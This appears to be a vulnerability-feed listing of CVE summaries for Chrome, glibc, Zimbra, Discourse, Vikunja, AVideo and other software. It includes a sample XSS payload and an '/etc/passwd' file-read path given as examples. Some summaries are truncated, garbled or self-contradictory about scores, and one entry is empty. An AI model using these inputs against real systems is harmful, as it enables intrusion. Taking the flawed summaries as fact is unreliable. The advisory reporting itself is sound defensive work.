Heap corruption in Google Chrome's WebAudio component (versions prior to 146.0.7680.153) can be triggered through out-of-bounds memory access when processing malicious HTML pages, enabling remote attackers to achieve arbitrary code execution without user interaction beyond viewing the page. The vulnerability affects Chrome, Ubuntu, and Debian systems, with patches now available across all platforms.

Google Information Disclosure Buffer Overflow Ubuntu Debian
CVE-2026-4458 HIGH CVSS 8.8
Heap memory corruption in Google Chrome prior to version 146.0.7680.153 can be triggered through malicious browser extensions, affecting Chrome users on Google, Ubuntu, and Debian systems. An attacker must convince a user to install a compromised extension to exploit this use-after-free vulnerability and potentially achieve code execution. A patch is available.

Google Use After Free Memory Corruption Denial Of Service Ubuntu
CVE-2026-4457 HIGH CVSS 8.8
Heap memory corruption in Google Chrome's V8 engine (versions prior to 146.0.7680.153) stems from type confusion vulnerabilities that can be triggered through malicious HTML pages without user privileges. An unauthenticated remote attacker can exploit this to achieve arbitrary code execution or crash the browser. The vulnerability affects Chrome, Ubuntu, and Debian systems, with patches now available.

Google Memory Corruption Information Disclosure Ubuntu Debian
CVE-2026-4456 HIGH CVSS 8.8
A use-after-free vulnerability in Google Chrome's Digital Credentials API prior to version 146.0.7680.153 enables attackers with a compromised renderer process to escape the sandbox and potentially achieve code execution through a specially crafted HTML page. The vulnerability affects Chrome on multiple platforms including Ubuntu and Debian systems, requiring user interaction to trigger but presenting high impact across confidentiality, integrity, and availability. A patch is available in Chrome 146.0.7680.153 and later versions.

Denial Of Service Google Memory Corruption Use After Free Ubuntu
CVE-2026-4455 HIGH CVSS 8.8
Heap buffer overflow in PDFium within Google Chrome versions prior to 146.0.7680.153 enables remote attackers to corrupt heap memory and potentially achieve code execution by delivering a malicious PDF file. The vulnerability requires user interaction to open the crafted PDF but no authentication or special privileges. Patches are available for affected Google Chrome, Ubuntu, and Debian systems.

Google Buffer Overflow Heap Overflow Ubuntu Debian
CVE-2026-4454 HIGH CVSS 8.8
Heap memory corruption in Google Chrome versions prior to 146.0.7680.153 can be triggered through a use-after-free vulnerability in the Network component when a user visits a malicious HTML page. An unauthenticated remote attacker can exploit this to achieve arbitrary code execution with high integrity and confidentiality impact. A patch is available for Chrome, Ubuntu, and Debian users.

Google Use After Free Memory Corruption Denial Of Service Ubuntu
CVE-2026-4452 HIGH CVSS 8.8
Heap corruption in Google Chrome's ANGLE graphics library on Windows versions prior to 146.0.7680.153 can be triggered through integer overflow when processing maliciously crafted HTML pages. An unauthenticated remote attacker can exploit this vulnerability by deceiving users into visiting a malicious website, potentially achieving arbitrary code execution. A patch is available across affected platforms including Google Chrome, Microsoft Edge, and various Linux distributions.

Google Microsoft Buffer Overflow Ubuntu Debian
CVE-2026-4451 HIGH CVSS 8.8
A renderer process sandbox escape vulnerability exists in Google Chrome prior to version 146.0.7680.153 due to insufficient input validation in the Navigation component. An attacker who has already compromised the renderer process can exploit this via a crafted HTML page to escape the sandbox and gain elevated privileges on the host system. A patch is available from Google, and the vulnerability is tracked in the EUVD database with High severity classification.

Google Information Disclosure Ubuntu Debian Chrome
CVE-2026-4450 HIGH CVSS 8.8
Heap corruption in Google Chrome's V8 engine prior to version 146.0.7680.153 can be triggered through out-of-bounds memory writes when a user visits a malicious webpage. An unauthenticated remote attacker can exploit this vulnerability to achieve arbitrary code execution with high integrity and confidentiality impact. A security patch is available for affected users on Chrome, Ubuntu, and Debian systems.

Google Memory Corruption Buffer Overflow Ubuntu Debian
CVE-2026-4449 HIGH CVSS 8.8
Heap memory corruption in Google Chrome's Blink rendering engine prior to version 146.0.7680.153 can be triggered through a malicious HTML page, potentially enabling remote code execution. An unauthenticated attacker requires only user interaction to exploit this use-after-free vulnerability across network boundaries. A patch is available for affected Chrome, Ubuntu, and Debian users.

Google Use After Free Memory Corruption Denial Of Service Ubuntu
CVE-2026-4448 HIGH CVSS 8.8
Heap buffer overflow in Google Chrome's ANGLE graphics library (versions prior to 146.0.7680.153) enables remote attackers to corrupt heap memory and potentially achieve arbitrary code execution through malicious HTML pages requiring only user interaction. The vulnerability affects Chrome on multiple platforms including Ubuntu and Debian systems. A patch is available and should be applied immediately given the high severity and attack accessibility.

Google Heap Overflow Buffer Overflow Ubuntu Debian
CVE-2026-4447 HIGH CVSS 8.8
A sandbox escape vulnerability exists in Google Chrome's V8 JavaScript engine prior to version 146.0.7680.153, allowing remote attackers to execute arbitrary code within the Chrome sandbox through a crafted HTML page. This is a High severity issue affecting millions of Chrome users across Windows, macOS, and Linux platforms. The vulnerability is triggered via web-based attack vector (HTML page delivery) and does not require user interaction beyond visiting a malicious website.

RCE Google Ubuntu Debian Chrome
CVE-2026-4446 HIGH CVSS 8.8
Heap corruption via use-after-free in Google Chrome's WebRTC implementation (versions prior to 146.0.7680.153) enables remote attackers to achieve arbitrary code execution through malicious HTML pages, requiring only user interaction. The vulnerability affects Chrome, Ubuntu, and Debian systems with a CVSS score of 8.8, though a patch is available.

Google Use After Free Memory Corruption Denial Of Service Ubuntu
CVE-2026-4445 HIGH CVSS 8.8
Heap memory corruption in Google Chrome's WebRTC implementation prior to version 146.0.7680.153 enables remote attackers to execute arbitrary code by tricking users into visiting malicious websites. The use-after-free vulnerability requires only user interaction and affects Chrome on multiple platforms including Ubuntu and Debian systems. A patch is available to address this high-severity flaw.

Google Use After Free Memory Corruption Denial Of Service Ubuntu
CVE-2026-4444 HIGH CVSS 8.8
Stack buffer overflow in Google Chrome's WebRTC implementation prior to version 146.0.7680.153 enables remote attackers to corrupt stack memory and achieve code execution through maliciously crafted HTML pages. The vulnerability affects Chrome, and potentially downstream products including Chromium-based browsers, requiring only user interaction and no authentication. A patch is available across affected platforms including Ubuntu and Debian.

Google Buffer Overflow Stack Overflow Ubuntu Debian
CVE-2026-4443 HIGH CVSS 8.8
Sandboxed arbitrary code execution in Google Chrome's WebAudio component (versions prior to 146.0.7680.153) can be triggered remotely through malicious HTML, requiring only user interaction. An attacker can craft a weaponized webpage to break out of the Chrome sandbox and execute arbitrary code on affected systems. This high-severity vulnerability impacts Chrome, Ubuntu, and Debian users, with patches now available.

Google Heap Overflow RCE Buffer Overflow Ubuntu
CVE-2026-4442 HIGH CVSS 8.8
Google Chrome versions prior to 146.0.7680.153 contain a heap buffer overflow in CSS parsing that enables remote code execution when users visit malicious HTML pages. An unauthenticated attacker can trigger heap memory corruption through a crafted webpage, potentially achieving arbitrary code execution with user privileges. A patch is available and should be applied immediately to all affected systems.

Google Heap Overflow Buffer Overflow Ubuntu Debian
CVE-2026-4441 HIGH CVSS 8.8
Heap corruption in Google Chrome versions before 146.0.7680.153 results from a use-after-free vulnerability in the Base component, enabling remote attackers to execute arbitrary code through malicious HTML pages. The attack requires user interaction but no authentication, affecting Chrome on multiple platforms including Linux distributions. A patch is available to remediate this critical-severity vulnerability.

Google Use After Free Memory Corruption Denial Of Service Ubuntu
CVE-2026-4440 HIGH CVSS 8.8
This is a critical out-of-bounds read and write vulnerability in the WebGL implementation of Google Chrome prior to version 146.0.7680.153. The vulnerability allows a remote attacker to perform arbitrary memory read and write operations by crafting a malicious HTML page, potentially leading to information disclosure, code execution, or complete system compromise. The vulnerability affects multiple Debian releases and has been assigned ENISA EUVD ID EUVD-2026-13447; a vendor patch is available.

Google Buffer Overflow Memory Corruption Ubuntu Debian
CVE-2026-4439 HIGH CVSS 8.8
Out-of-bounds memory corruption in Google Chrome's WebGL implementation on Android prior to version 146.0.7680.153 enables remote attackers to escape the browser sandbox by delivering a malicious HTML page, requiring only user interaction. This critical vulnerability affects Chrome users on Android devices and could lead to complete system compromise if successfully exploited. A patch is available in Chrome 146.0.7680.153 and later versions.

Google Buffer Overflow Memory Corruption Ubuntu Debian
CVE-2026-4437 HIGH CVSS 7.5
A DNS response parsing vulnerability exists in the GNU C Library (glibc) versions 2.34 through 2.43 affecting the gethostbyaddr and gethostbyaddr_r functions. When a malicious or compromised DNS server returns a crafted response that violates the DNS specification, the library may incorrectly treat non-answer sections (such as authority or additional sections) as valid answers, leading to buffer overflow and information disclosure. The vulnerability is classified as a read buffer over-read (CWE-125) and does not currently have a published CVSS score, EPSS metric, or confirmed KEV status, though the underlying mechanism suggests moderate real-world risk in environments with untrusted or attacker-controlled DNS infrastructure.

Information Disclosure Buffer Overflow
CVE-2026-4434 HIGH CVSS 8.1
Devolutions Server contains an improper certificate validation vulnerability in its PAM propagation WinRM connections that allows network attackers to conduct man-in-the-middle (MITM) attacks by exploiting disabled TLS certificate verification. This vulnerability affects Devolutions Server versions prior to 2026.1, enabling attackers positioned on the network path to intercept and manipulate WinRM communications without detection. The vulnerability is classified under CWE-295 (Improper Certificate Validation) and carries significant information disclosure and server compromise risks, particularly in environments where PAM propagation relies on WinRM for credential delivery and privileged session management.

Information Disclosure
CVE-2026-3368 HIGH CVSS 7.2
The Injection Guard plugin for WordPress versions up to 1.2.9 contains a stored cross-site scripting (XSS) vulnerability that allows unauthenticated attackers to inject malicious JavaScript into the admin log interface. The flaw stems from insufficient sanitization of query parameter names, which are logged and later rendered without proper output escaping when administrators view the plugin's log page. This enables arbitrary script execution in the context of an authenticated administrator's browser session, potentially leading to account compromise or further malicious actions.

WordPress PHP XSS
CVE-2026-2378 HIGH CVSS 7.4
ArcSearch for Android versions prior to 1.12.7 contains an address bar spoofing vulnerability that allows attackers to display a different domain in the browser's address bar than the actual content being rendered. Users of ArcSearch for Android prior to version 1.12.7 are affected, and an attacker can craft malicious web content that, after user interaction, deceives users into believing they are visiting a legitimate domain while viewing attacker-controlled content. There is no indication of active exploitation in KEV data, and EPSS data is not provided.

XSS Google Android
CVE-2026-0677 HIGH CVSS 7.2
This is a deserialization of untrusted data vulnerability (PHP Object Injection) in the TotalContest Lite WordPress plugin that allows authenticated attackers with high-level privileges to inject arbitrary PHP objects. The vulnerability affects all versions through 2.9.1 of the TotalContest Lite plugin from TotalSuite. With a CVSS score of 7.2, successful exploitation can lead to high impact on confidentiality, integrity, and availability of the affected system.

Deserialization
CVE-2025-67260 HIGH CVSS 8.8
A file upload vulnerability exists in multiple Terrapack software components from ASTER TEC / ASTER S.p.A. that permits remote code execution when attackers upload malicious files. The affected products include Terrapack TkWebCoreNG version 1.0.20200914, Terrapack TKServerCGI version 2.5.4.150, and Terrapack TpkWebGIS Client version 1.0.0. Proof-of-concept code is available in public repositories, and the vulnerability enables arbitrary code execution on affected systems.

RCE File Upload
CVE-2025-63261 HIGH CVSS 7.8
AWStats 8.0 contains a command injection vulnerability in the open function that allows attackers to execute arbitrary system commands. The vulnerability affects the AWStats web analytics application, and attackers can exploit this flaw to achieve remote code execution on systems running vulnerable versions. A proof-of-concept has been documented in the referenced pentest-tools PDF, indicating practical exploitability.

Command Injection
CVE-2025-62846 HIGH CVSS 7.3
An SQL injection vulnerability exists in QNAP QuRouter that allows authenticated local administrators to execute unauthorized code or commands through SQL injection techniques. The vulnerability affects QuRouter versions prior to 2.6.2.007, and exploitation requires an attacker to first obtain legitimate administrator credentials on the affected device. While no CVSS score or EPSS data is currently published, the SQL injection classification (CWE-89) combined with code execution impact represents a critical risk for compromised administrator accounts.

SQLi RCE Privilege Escalation Qurouter
CVE-2025-55988 HIGH CVSS 7.2
A path traversal vulnerability in the component /Controllers/RestController.php of DreamFactory Core (CVSS 7.2) that allows attackers. High severity vulnerability requiring prompt remediation.

PHP Path Traversal
CVE-2025-46597 HIGH CVSS 7.5
Bitcoin Core versions 0.13.0 through 29.x contain an integer overflow vulnerability that could allow attackers to trigger unexpected behavior or crashes in affected nodes. This vulnerability affects a wide range of Bitcoin Core deployments spanning multiple major versions. While specific exploitation details remain limited due to the disclosure date and incomplete CVSS scoring, the integer overflow classification suggests potential for denial of service or memory corruption under specific conditions.

Integer Overflow Buffer Overflow
CVE-2025-15608 HIGH CVSS 7.7
A stack-based buffer overflow vulnerability exists in TP-Link AX53 v1 due to insufficient input sanitization in the device's probe handling logic, allowing unauthenticated remote attackers to cause denial of service through repeated service crashes and potentially achieve remote code execution via heap-spray techniques under specific conditions. The vulnerability affects TP-Link AX53 v1 devices and has a patch available from the vendor, though no confirmed active exploitation or public proof-of-concept has been widely reported at this time.

RCE Buffer Overflow Stack Overflow
CVE-2025-15607 HIGH CVSS 7.3
A command injection vulnerability exists in TP-Link AX53 v1 devices within the mscd debug functionality that allows authenticated attackers to execute arbitrary commands with full device control. The vulnerability stems from insufficient input validation on log redirection parameters, which can be abused to concatenate unvalidated file content into shell commands. A vendor patch is available, and this represents a critical control-plane compromise vector for affected router devices.

Command Injection
CVE-2024-32537 HIGH CVSS 7.1
Cross-Site request forgery (CSRF) vulnerability in joshuae1974 Flash Video Player allows Cross Site Request Forgery.0.4. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

CSRF
CVE-2026-33501 MEDIUM CVSS 5.3
An unauthenticated information disclosure vulnerability exists in the AVideo Permissions plugin endpoint `list.json.php`, which exposes the complete permission matrix mapping user groups to installed plugins without any authentication check. The vulnerability affects AVideo instances with the Permissions plugin enabled and allows unauthenticated attackers to enumerate all user groups, plugins, and their permission assignments-information that significantly aids targeted privilege escalation attacks. A proof-of-concept curl command exists, and this represents a clear authentication bypass in a sensitive administrative endpoint.

PHP Authentication Bypass Privilege Escalation
CVE-2026-33500 MEDIUM CVSS 5.4
A stored cross-site scripting (XSS) vulnerability exists in AVideo's comment markdown processing, where the fix for a prior XSS issue (CVE-2026-27568) inadvertently disabled Parsedown's safe mode while implementing incomplete custom sanitization. An attacker with comment posting privileges can inject malicious JavaScript via markdown link syntax (e.g., `[text](javascript:alert(1))`) that executes in the browser context of any user viewing the comment, enabling session hijacking and account takeover. A working proof-of-concept exists and the vulnerability affects all versions of WWBN AVideo using the vulnerable ParsedownSafeWithLinks class (pkg:composer/wwbn_avideo).

PHP XSS
CVE-2026-33499 MEDIUM CVSS 6.1
AVideo contains a reflected cross-site scripting (XSS) vulnerability in the password unlock functionality where the unlockPassword request parameter is directly reflected into HTML input tag attributes without output encoding. The vulnerability affects AVideo (pkg:composer/wwbn_avideo) and can be exploited by any unauthenticated attacker to execute arbitrary JavaScript in the victim's browser with no user interaction beyond clicking a crafted link, potentially leading to session hijacking, account takeover, or credential theft. A proof-of-concept has been published and the vulnerability is documented in the official GitHub advisory.

PHP XSS
CVE-2026-33495 MEDIUM CVSS 6.5
Ory Oathkeeper improperly trusts the X-Forwarded-Proto header regardless of the serve.proxy.trust_forwarded_headers configuration setting, allowing attackers to bypass protocol-based access controls. This affects deployments of pkg:go/github.com_ory_oathkeeper where distinct HTTP and HTTPS rules are configured, enabling an attacker to craft requests with spoofed X-Forwarded-Proto headers to trigger unintended authorization rules. A vendor patch is available and exploitation requires specific preconditions (protocol-differentiated rules and ability to trigger one rule but not the other), limiting real-world impact despite the CVSS 6.5 score.

Authentication Bypass
CVE-2026-33481 MEDIUM CVSS 5.3
Syft versions before v1.42.3 fail to properly clean up temporary files when temporary storage becomes exhausted during archive scanning, allowing an attacker to trigger a denial of service by exhausting the system's temporary storage through highly compressed or large artifacts. This affects all users of Syft who scan untrusted or adversarially-crafted archives, as the vulnerability requires no authentication and can be triggered remotely through the normal scanning interface. The vulnerability has been patched in v1.42.3 and no active exploitation has been reported in the wild, though the attack vector is straightforward and does not require special privileges.

Information Disclosure
CVE-2026-33474 MEDIUM CVSS 6.5
An unbounded image decoding and resizing vulnerability in Vikunja's task attachment preview generation allows authenticated attackers to exhaust server CPU and memory by uploading highly compressed but extremely large-dimension images. The vulnerability affects Vikunja API versions with task attachments enabled, and a proof-of-concept script demonstrates that a 10,000×10,000 PNG (~284 KB on disk) can expand to ~100M pixels in memory during decode, causing significant latency and potential denial of service. Multiple concurrent preview requests across different attachments can degrade or crash the service, with a CVSS score of 7.5 indicating high availability impact.

Denial Of Service
CVE-2026-33473 MEDIUM CVSS 5.7
A time-based one-time password (TOTP) reuse vulnerability exists in Vikunja's authentication implementation where a valid TOTP code can be used multiple times within its 30-second validity window, allowing an attacker who captures or obtains a valid code to authenticate as a targeted user. This affects all users who have enabled two-factor authentication (2FA) on Vikunja instances, and while the CVSS score of 5.7 reflects moderate severity, the vulnerability undermines a critical layer of the defense-in-depth authentication model. A proof-of-concept demonstrating the reuse attack has been publicly disclosed.

Microsoft Authentication Bypass Windows
CVE-2026-33429 MEDIUM CVSS 6.3
An information disclosure vulnerability in Parse Server's LiveQuery functionality allows attackers to infer the values of protected fields by monitoring whether update events are generated when those fields change, effectively creating a binary oracle that reveals field modifications despite the field values themselves being stripped from event payloads. The vulnerability affects Parse Server npm package across multiple versions, and while no public exploit code or active exploitation has been documented, the attack requires only standard subscription capabilities without elevated privileges. The vendor has released patches that validate the watch parameter against protected fields at subscription time, mirroring existing where clause protections.

Information Disclosure Oracle
CVE-2026-33428 MEDIUM CVSS 6.5
An authorization bypass vulnerability exists in Discourse prior to versions 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, where non-staff users with elevated group membership can access deleted posts belonging to any user through an overly permissive authorization check on the deleted posts index endpoint. This is a CWE-863 (Incorrect Authorization) vulnerability that allows unauthorized information disclosure of deleted content. No public exploit or active exploitation in the wild has been reported, but patches are available and no workarounds exist.

Authentication Bypass
CVE-2026-33425 MEDIUM CVSS 5.3
An information disclosure vulnerability in Discourse prior to versions 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 allows unauthenticated attackers to enumerate private group membership by observing directory result changes when manipulating the exclude_groups parameter. This enables attackers to determine whether specific users are members of private groups without authentication, representing a direct privacy violation. The vulnerability does not appear to be actively exploited in the wild (no KEV status indicated), but patches are available from the vendor.

Information Disclosure
CVE-2026-33424 MEDIUM CVSS 5.9
Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain an access control bypass vulnerability where attackers can grant invites to private message topics even after losing direct access to those conversations. This authentication bypass (CWE-863) allows unauthorized lateral privilege escalation within discussion communities. No public exploit code has been widely reported, but the vulnerability is patched across multiple release branches, indicating vendor awareness of active exploitation risk.

Authentication Bypass
CVE-2026-33411 MEDIUM CVSS 5.4
A stored cross-site scripting (XSS) vulnerability exists in Discourse's solved posts stream feature where unsanitized topic titles can be persisted and executed in the browser context of authenticated users. The vulnerability affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, allowing authenticated attackers to inject malicious JavaScript that executes in the browsers of other users viewing the affected topics. While the CVSS score of 5.4 reflects moderate severity with low impact scope and no availability impact, the attack requires user interaction indirectly through viewing a crafted topic title, making real-world exploitation limited to scenarios where attackers have post creation privileges.

XSS
CVE-2026-33372 MEDIUM CVSS 5.4
Zimbra Collaboration Server 10.0 and 10.1 accept CSRF tokens from request bodies instead of enforcing header-based validation, allowing attackers to perform unauthorized actions by deceiving authenticated users into submitting malicious requests. This CSRF bypass affects webmail users and could enable account compromise or sensitive data modification without user awareness. No patch is currently available.

CSRF
CVE-2026-33371 MEDIUM CVSS 4.3
An XML External Entity (XXE) vulnerability exists in Zimbra Collaboration Server (ZCS) versions 10.0 and 10.1 within the Exchange Web Services (EWS) SOAP interface due to improper XML input handling. An authenticated attacker can submit crafted XML payloads to an XML parser with external entity resolution enabled, potentially disclosing sensitive local files from the server. No CVSS score, EPSS data, or known exploitation-in-the-wild status is currently available, though the vulnerability has been documented in Zimbra's security advisory system.

XXE Microsoft
CVE-2026-33370 MEDIUM CVSS 6.1
A stored cross-site scripting (XSS) vulnerability exists in Zimbra Collaboration Server (ZCS) versions 10.0 and 10.1 within the Briefcase feature, caused by insufficient sanitization of uploaded file types. When an attacker crafts a malicious file and shares it via the Briefcase public sharing mechanism, the embedded JavaScript executes in the victim's browser session context when the file is opened, enabling arbitrary script execution, session hijacking, credential theft, and unauthorized actions on behalf of the victim. No CVSS score, EPSS data, or active KEV status is currently available, though the attack vector is network-based with low complexity and requires user interaction (file opening).

XSS
CVE-2026-33369 MEDIUM CVSS 4.3
An LDAP injection vulnerability exists in Zimbra Collaboration Server (ZCS) versions 10.0 and 10.1 within the Mailbox SOAP service's FolderAction operation. An authenticated attacker can exploit this issue by sending a crafted SOAP request containing malicious LDAP filter syntax to bypass input validation and retrieve sensitive directory attributes from the LDAP backend. This vulnerability enables information disclosure of directory data that should be access-controlled.

Information Disclosure
CVE-2026-33368 MEDIUM CVSS 6.1
A reflected cross-site scripting (XSS) vulnerability exists in the Zimbra Collaboration Suite (ZCS) Classic Webmail REST interface (/h/rest) affecting versions 10.0 and 10.1, allowing unauthenticated attackers to inject malicious JavaScript via crafted URLs. When a victim accesses the malicious link, the injected script executes within the Zimbra webmail application context, enabling the attacker to perform unauthorized actions on behalf of the victim such as reading emails, modifying settings, or sending messages. No CVSS score, EPSS probability, or public exploit code availability data is currently documented in the available intelligence sources, though the vulnerability is documented in the Zimbra Releases 10.1.16 security fixes, indicating a patch has been made available.

XSS
CVE-2026-33343 MEDIUM CVSS 5.9
An authenticated user with restricted RBAC permissions on specific key ranges in etcd can use nested transactions to completely bypass key-level authorization controls and access the entire etcd data store. This affects etcd versions 3.4.x before 3.4.42, 3.5.x before 3.5.28, and 3.6.x before 3.6.9. While Kubernetes deployments are typically protected because Kubernetes handles authentication and authorization at the API server layer rather than relying on etcd's built-in controls, direct etcd deployments with RBAC restrictions are at significant risk.

Kubernetes Authentication Bypass
CVE-2026-33315 MEDIUM CVSS 4.3
The Vikunja todo application contains an authentication bypass vulnerability in its CalDAV endpoint that allows attackers to circumvent two-factor authentication (2FA) protections by using basic HTTP authentication. An attacker with valid username and password credentials can access CalDAV endpoints without providing a TOTP token, gaining unauthorized access to protected project information including names, descriptions, and task details. A proof-of-concept exploit has been publicly documented, and patches are available from the vendor.

Authentication Bypass Docker
CVE-2026-33313 MEDIUM CVSS 4.3
An authenticated user in Vikunja can read any task comment by its ID without proper authorization checks, regardless of whether they have access to the task that comment belongs to. The vulnerability exists in the `GET /api/v1/tasks/{taskID}/comments/{commentID}` endpoint, which validates access against the attacker-controlled task ID in the URL but then loads the comment by ID alone, bypassing task ownership verification. Any authenticated attacker with read access to at least one task can enumerate and retrieve comments from arbitrary tasks and private projects, leading to unauthorized information disclosure.

Authentication Bypass
CVE-2026-33312 MEDIUM CVSS 5.4
A permission-check bypass vulnerability exists in Vikunja versions 0.20.2 through 2.1.x where the DELETE /api/v1/projects/:project/background endpoint incorrectly validates CanRead permissions instead of CanUpdate permissions, allowing read-only project members to permanently delete a project's background image. This affects the go-vikunja:vikunja product family, and the vulnerability has been patched in version 2.2.0 as documented in the GitHub security advisory GHSA-564f-wx8x-878h.

Authentication Bypass
CVE-2026-33291 MEDIUM CVSS 5.4
A broken access control vulnerability in Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 allows moderators to create Zendesk support tickets for topics they lack permission to view, bypassing intended access restrictions. This affects all Discourse forums utilizing the Zendesk plugin integration. The vulnerability is classified as CWE-863 (Incorrect Authorization) and has no publicly disclosed active exploitation or proof-of-concept code, though patches are available from the vendor.

Authentication Bypass
CVE-2026-33251 MEDIUM CVSS 5.4
An authorization bypass vulnerability in Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 allows authenticated users to accept or unaccept solutions in hidden Solved topics without proper authorization checks. The vulnerability affects the open-source Discourse discussion platform and permits users with valid credentials to manipulate solution status across topics they should not have access to, resulting in information disclosure and integrity violations. This is a low-to-moderate severity issue with a CVSS score of 5.4 that requires prior authentication but carries exploitation risk in multi-tenant or federated Discourse installations.

Authentication Bypass
CVE-2026-33179 MEDIUM CVSS 5.5
libfuse versions 3.18.0 through 3.18.1 contain a NULL pointer dereference and memory leak vulnerability in the fuse_uring_init_queue function that affects only the io_uring transport implementation. A local user with low privileges can trigger this vulnerability to crash the FUSE daemon or exhaust system resources through repeated exploitation. A proof-of-concept has been confirmed with AddressSanitizer and LeakSanitizer, demonstrating both the NULL dereference condition and memory leak when numa_alloc_local or fuse_uring_register_queue fail.

Denial Of Service Null Pointer Dereference
CVE-2026-33165 MEDIUM CVSS 5.5
A remote code execution vulnerability in libde265 (CVSS 5.5). Remediation should follow standard vulnerability management procedures.

Memory Corruption Buffer Overflow
CVE-2026-33144 MEDIUM CVSS 5.8
Heap-based buffer overflow in GPAC MP4Box's XML parsing function allows local attackers to corrupt memory and potentially crash the application or achieve code execution by crafting malicious NHML files with specially formatted BitSequence elements. The vulnerability affects systems processing untrusted multimedia files and remains unpatched as of this advisory. Exploitation requires user interaction to open a malicious file.

Memory Corruption Buffer Overflow
CVE-2026-33130 MEDIUM CVSS 6.5
Uptime Kuma versions 1.23.0 through 2.2.0 contain an incomplete Server-Side Template Injection (SSTI) vulnerability in the LiquidJS templating engine that allows authenticated attackers to read arbitrary files from the server. A prior fix (GHSA-vffh-c9pq-4crh) attempted to restrict file path access through three mitigation options (root, relativeReference, dynamicPartials), but this fix only blocks quoted paths; attackers can bypass the mitigation by using unquoted absolute paths like /etc/passwd that successfully resolve through the require.resolve() fallback mechanism in liquid.node.js. The vulnerability requires low privileges (authenticated access) but can result in high confidentiality impact, making it a notable information disclosure risk for self-hosted monitoring deployments.

Node.js Lfi Code Injection PHP
CVE-2026-33126 MEDIUM CVSS 5.0
Frigate versions prior to 0.16.3 contain a Server-Side Request Forgery (SSRF) vulnerability in the /ffprobe endpoint that accepts arbitrary user-controlled URLs without proper validation. An authenticated attacker can leverage this endpoint to make HTTP requests to internal network resources, cloud metadata services (such as AWS IMDSv1), or perform reconnaissance activities like port scanning against systems accessible from the Frigate server. The vulnerability requires low privileges (authenticated user) and has a network attack vector with low complexity, making it moderately exploitable in environments where Frigate is exposed to untrusted users.

SSRF
CVE-2026-33071 MEDIUM CVSS 4.3
FileRise, a self-hosted web file manager and WebDAV server, contains an unrestricted file upload vulnerability in its WebDAV endpoint that bypasses filename validation controls present in the regular upload path, allowing authenticated attackers to upload executable file types such as .phtml, .php5, and .htaccess. In non-default Apache configurations lacking LocationMatch protection, this enables remote code execution on the underlying web server. The vulnerability affects FileRise versions prior to 3.8.0 and has been patched; no public exploit code or active KEV listing is currently confirmed, but the presence of a GitHub security advisory indicates vendor acknowledgment of the threat.

PHP RCE Apache File Upload
CVE-2026-33061 MEDIUM CVSS 5.8
Jexactyl, a game management panel and billing system, contains a stored DOM-based cross-site scripting (XSS) vulnerability in its template rendering engine where server-side objects are injected into client-side JavaScript without proper escaping. The vulnerability affects versions after commit 025e8dbb0daaa04054276bda814d922cf4af58da and before the patched commit e28edb204e80efab628d1241198ea4f079779cfd, allowing authenticated attackers with high privileges to inject malicious payloads through attacker-controlled fields such as usernames or display names that execute arbitrary JavaScript in the browsers of all users viewing the affected page. The CVSS score of 5.8 reflects local attack vector requirements and high privilege prerequisites, though the stored nature of the XSS and lack of user interaction requirements for viewing the malicious content represent meaningful security risk for multi-user deployments.

XSS PHP
CVE-2026-33056 MEDIUM CVSS 6.5
The tar-rs library versions 0.4.44 and below contain a symlink-following vulnerability in the unpack_dir function that allows attackers to modify permissions on arbitrary directories outside the extraction root. An attacker can craft a malicious tarball containing a symlink entry followed by a directory entry with the same name; when unpacked, the library follows the symlink and applies chmod to the target directory rather than validating it resides within the extraction root. This vulnerability has a CVSS score of 5.1 with network accessibility and low attack complexity, making it exploitable by remote attackers without privileges or special user interaction beyond accepting a crafted archive.

Information Disclosure
CVE-2026-32986 MEDIUM CVSS 6.1
A second-order XSS vulnerability exists in Textpattern CMS version 4.9.0 where user-supplied input (such as category parameters) is improperly sanitized and lacks contextual XML escaping in Atom feed XML elements like <id> and <link href>. While the payload does not execute directly in raw XML contexts within modern browsers, it becomes exploitable when feed readers, admin dashboards, or CMS aggregators consume the feed and insert its content into the DOM using unsafe methods like innerHTML, resulting in arbitrary JavaScript execution in a trusted context. A public proof-of-concept exploit is available, making this an active threat to administrators and users consuming feeds from vulnerable Textpattern instances.

XSS
CVE-2026-32935 MEDIUM CVSS 5.9
phpseclib versions 1.0.26 and below, 2.0.0 through 2.0.51, and 3.0.0 through 3.0.49 are vulnerable to a padding oracle timing attack when using AES in CBC mode, allowing attackers to decrypt sensitive data through cryptanalysis of response timing differences. This information disclosure vulnerability affects any PHP application using the vulnerable phpseclib library for AES-CBC encryption. Although no CVSS score, EPSS data, or confirmed active exploitation (KEV status) are currently available, the presence of a verified fix and security advisory indicates this is a legitimate cryptographic weakness requiring attention.

PHP Oracle Information Disclosure
CVE-2026-32889 MEDIUM CVSS 6.5
A non-terminating loop denial-of-service vulnerability exists in tinytag version 2.2.0, a Python library for reading audio file metadata. An attacker can supply a malicious MP3 file containing a crafted ID3v2 SYLT (synchronized lyrics) frame that causes the parsing operation to enter an infinite loop, consuming CPU resources until the worker process is terminated. The vulnerability affects server-side deployments that automatically parse user-supplied files, and has been patched in version 2.2.1.

Python Denial Of Service
CVE-2026-32881 MEDIUM CVSS 5.3
ewe, a Gleam web server, contains an authentication bypass vulnerability in versions 0.6.0 through 3.0.4 that exploits improper handling of chunked transfer encoding trailer headers. An unauthenticated remote attacker can declare sensitive HTTP headers in the Trailer field and append them after the final chunk to overwrite legitimate values set by reverse proxies, enabling them to forge authentication credentials, hijack sessions, bypass rate limiting, or spoof proxy-trust headers. The vulnerability has been patched in version 3.0.5, and while not currently listed in CISA's KEV catalog, the CVSS score of 5.3 reflects medium severity with integrity impact.

Authentication Bypass
CVE-2026-32880 MEDIUM CVSS 6.4
ChurchCRM versions prior to 7.0.2 contain a stored cross-site scripting (XSS) vulnerability in the system settings module where administrative users can inject unescaped JavaScript payloads into JSON-type system settings fields. Any administrator who subsequently views the system settings page will execute the attacker's malicious script, potentially allowing credential theft, session hijacking, or lateral movement within the church organization's administrative infrastructure. The vulnerability has been patched in version 7.0.2, and no evidence of active exploitation in the wild has been reported, though the attack requires only high-level privileges (admin access) and basic user interaction (viewing settings).

PHP XSS
CVE-2026-32844 MEDIUM CVSS 6.1
